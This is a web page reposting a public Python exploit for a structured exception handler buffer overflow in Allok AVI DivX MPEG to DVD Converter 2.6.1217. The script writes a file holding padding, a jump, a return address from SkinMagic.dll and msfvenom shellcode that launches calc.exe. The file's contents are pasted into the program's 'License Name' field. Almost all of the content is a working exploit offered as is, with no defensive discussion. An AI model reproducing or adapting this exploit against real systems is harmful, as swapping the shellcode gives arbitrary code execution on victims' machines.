首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Allok AVI DivX MPEG To DVD Converter 2.6.1217 Buffer Overflow
来源:vfocus.net 作者:wetw0rk 发布时间:2018-03-30  
#!/usr/bin/env python
#
# Exploit Title         : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
# Date                  : 3/27/18
# Exploit Author        : wetw0rk
# Vulnerable Software   : Allok AVI DivX MPEG to DVD Converter
# Vendor Homepage       : http://alloksoft.com/
# Version               : 2.6.1217
# Software Link         : http://alloksoft.com/allok_avimpeg2dvd.exe
# Tested On             : Windows 10 , Windows 7 (x86-64)
#
# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
#
# Trigger the vulnerability by:
#   Copy text file contents -> paste into "License Name" -> calc
#

shellcode = "\x90" * 20 # nop sled
shellcode += (          # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
)

offset  = "A" * 780
nSEH    = "\x90\x90\xeb\x06" # jmp +0x06
SEH     = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
    offset  +
    nSEH    +
    SEH     +
    shellcode
    )
)

payload = offset + nSEH + SEH + shellcode + trigger 
fd = open("pasteME.txt", "w")
fd.write(payload)
fd.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Square 9 GlobalForms 6.2.x Bli
·Drupal 7.0 < 7.31 - 'Drupalged
·SysGauge 4.5.18 Denial Of Serv
·GitStack - Unsanitized Argumen
·TwonkyMedia Server 7.0.11-8.5
·Exodus Wallet (ElectronJS Fram
·Tenda N11 Wireless Router 5.07
·Joomla Component Fields - SQLi
·ClipBucket beats_uploader Unau
·Tenda W308R V2 Wireless Router
·Laravel Log Viewer < 0.13.0 -
·ManageEngine Application Manag
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved